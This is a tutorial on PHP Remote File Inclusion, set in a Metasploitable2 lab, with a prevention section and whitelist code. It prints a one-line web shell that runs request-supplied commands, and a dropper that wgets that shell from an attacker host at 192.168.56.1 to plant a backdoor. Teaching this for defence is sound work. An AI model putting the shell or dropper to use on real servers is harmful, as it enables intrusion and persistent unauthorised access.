RFI stands for Remote File Inclusion. This vulnerability allows an attacker to dynamically include files/scripts from remote/external sources into the web server. It occurs due to poorly implemented security checks and sanitization. Successful exploitation of an RFI vulnerability leads to remote code execution, cross-site scripting, information disclosure, etc. For example:
<?php $file = $_GET['file']; include($file); ?>
The above page takes a file name as input and includes that file.
But the above PHP code is vulnerable to an RFI attack: an attacker could easily include remote files and run them on the web server.
Now let's see an example of the attack. Also note that in PHP version 5 and above the allow_url_include option is disabled by default, and in order to experiment with RFI you have to enable it.
In this example I am going to use the Metasploitable2 VM. The download links are given below: Download Link.
You also need to enable the allow_url_include option in Metasploitable2. To do that, open the file /etc/php5/cgi/php.ini with the nano or vi editor and go to line 576:
allow_url_include = Off
On that line, change Off to On:
allow_url_include = On
Our vulnerable page will take a page name and include that page.
Now we try to include an external file from a remote source.
File : shell.php
<?php $cmd = $_GET['cmd']; system($cmd); ?>
The URL of the PHP file is:
And in the web application, the URL will be:
And as we can see, the ls command is successfully executed on the web server. We can also drop our backdoor file on the web server with the code below:
File : load.php
<?php shell_exec('wget http://192.168.56.1:8000/shell.php -O /var/www/shell.php') ?>
The above code will download shell.php and store it on
And after the above request, we can access our backdoor ‘shell.php’, with
Preventing Remote File Inclusion (RFI) vulnerability
The best way to eliminate Remote File Inclusion (RFI) vulnerabilities is to avoid dynamically including files based on user input. If this is not possible, the application should maintain a whitelist of files that can be included in order to limit the attacker’s control over what gets included. We can also minimize the risk of RFI attacks through proper input validation and sanitization. It’s always preferable to sanitize user-supplied/controlled inputs to the best of your ability.
These inputs include:
- GET/POST parameters
- URL parameters
- Cookie values
- HTTP header values
It is also recommended to implement validation mechanisms on the server side, because client-side validation can be easily bypassed by using a proxy tool like Burp Suite, ZAP proxy, etc.
Additionally, in the case of PHP, most modern PHP configurations have allow_url_include set to Off, which would not allow an attacker to include remote files, but the application may still be vulnerable to a Local File Inclusion attack.
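One way to apply the whitelist approach to the vulnerable page shown at the top, as an added example that is not code from the original post. The page names, the pages/ directory and the resolve_page() helper are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Whitelist: request value => file on disk. The page names and the pages/
// directory are assumptions for this example. Nothing taken from the
// request is ever concatenated into the include path.
const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Map a user-supplied page name to a fixed local path.
 * Returns null when the name is not on the whitelist.
 * (Hypothetical helper, named for this example.)
 */
function resolve_page($requested): ?string
{
    // Reject arrays (?file[]=x) and any other non-string input.
    if (!is_string($requested)) {
        return null;
    }
    // Exact key lookup: remote URLs, "../" sequences and stream wrappers
    // never match a key, so no blacklist or string filtering is needed.
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    return PAGES_DIR . '/' . ALLOWED_PAGES[$requested];
}

// Defence in depth: log a warning if php.ini still permits remote includes.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    error_log('allow_url_include is On; set it to Off in php.ini');
}

// Same "file" parameter as the vulnerable page, now resolved server-side.
$path = resolve_page($_GET['file'] ?? 'home');
if ($path === null || !is_file($path)) {
    http_response_code(404);
    exit('Page not found');
}
include $path;
```

Because the include path is built only from whitelist values, the same check also covers the Local File Inclusion case that remains when allow_url_include is Off.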